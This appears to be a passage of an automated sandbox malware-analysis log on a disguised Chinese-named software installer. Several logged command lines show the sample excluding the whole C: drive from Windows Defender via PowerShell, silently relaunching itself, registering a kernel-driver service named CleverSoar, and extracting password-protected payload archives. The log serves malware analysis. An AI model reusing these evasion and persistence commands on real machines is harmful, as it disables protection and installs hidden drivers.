Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00417200 10_2_00417200
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041D2C0 10_2_0041D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041F3C0 10_2_0041F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003E53F3 10_2_003E53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003AB3E4 10_2_003AB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0040F3A0 10_2_0040F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003853CF 10_2_003853CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003F7410 10_2_003F7410
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041D470 10_2_0041D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0040F420 10_2_0040F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004154D0 10_2_004154D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003CD496 10_2_003CD496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00411550 10_2_00411550
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FF500 10_2_003FF500
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00381572 10_2_00381572
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0042351A 10_2_0042351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00413530 10_2_00413530
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041F599 10_2_0041F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00423601 10_2_00423601
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003D9652 10_2_003D9652
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0040D6A0 10_2_0040D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00399766 10_2_00399766
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004177C0 10_2_004177C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003897CA 10_2_003897CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003AF8E0 10_2_003AF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FF910 10_2_003FF910
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041D9E0 10_2_0041D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00381AA1 10_2_00381AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00407AF0 10_2_00407AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003D3AEF 10_2_003D3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0039BAC9 10_2_0039BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00407C50 10_2_00407C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0039BC92 10_2_0039BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00405E80 10_2_00405E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00405F80 10_2_00405F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: String function: 6CA97240 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: String function: 6CB34F10 appears 415 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00381E40 appears 84 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 003828E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 0041FB10 appears 720 times
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000000.1702203686.00000000002F9000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.000000000357E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F94A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr Binary string: \Device\TfKbMonPWLCache
Source: classification engine Classification label: mal80.evad.winEXE@146/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA64B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, 6_2_6CA64B80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00389313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 10_2_00389313
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00393D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_00393D66
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00389252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW, 10_2_00389252
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA64050 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW, 6_2_6CA64050
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\is-G3Q97.tmp
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2416:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5548:120:WilError_03
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe File created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe File read: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: unknown Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
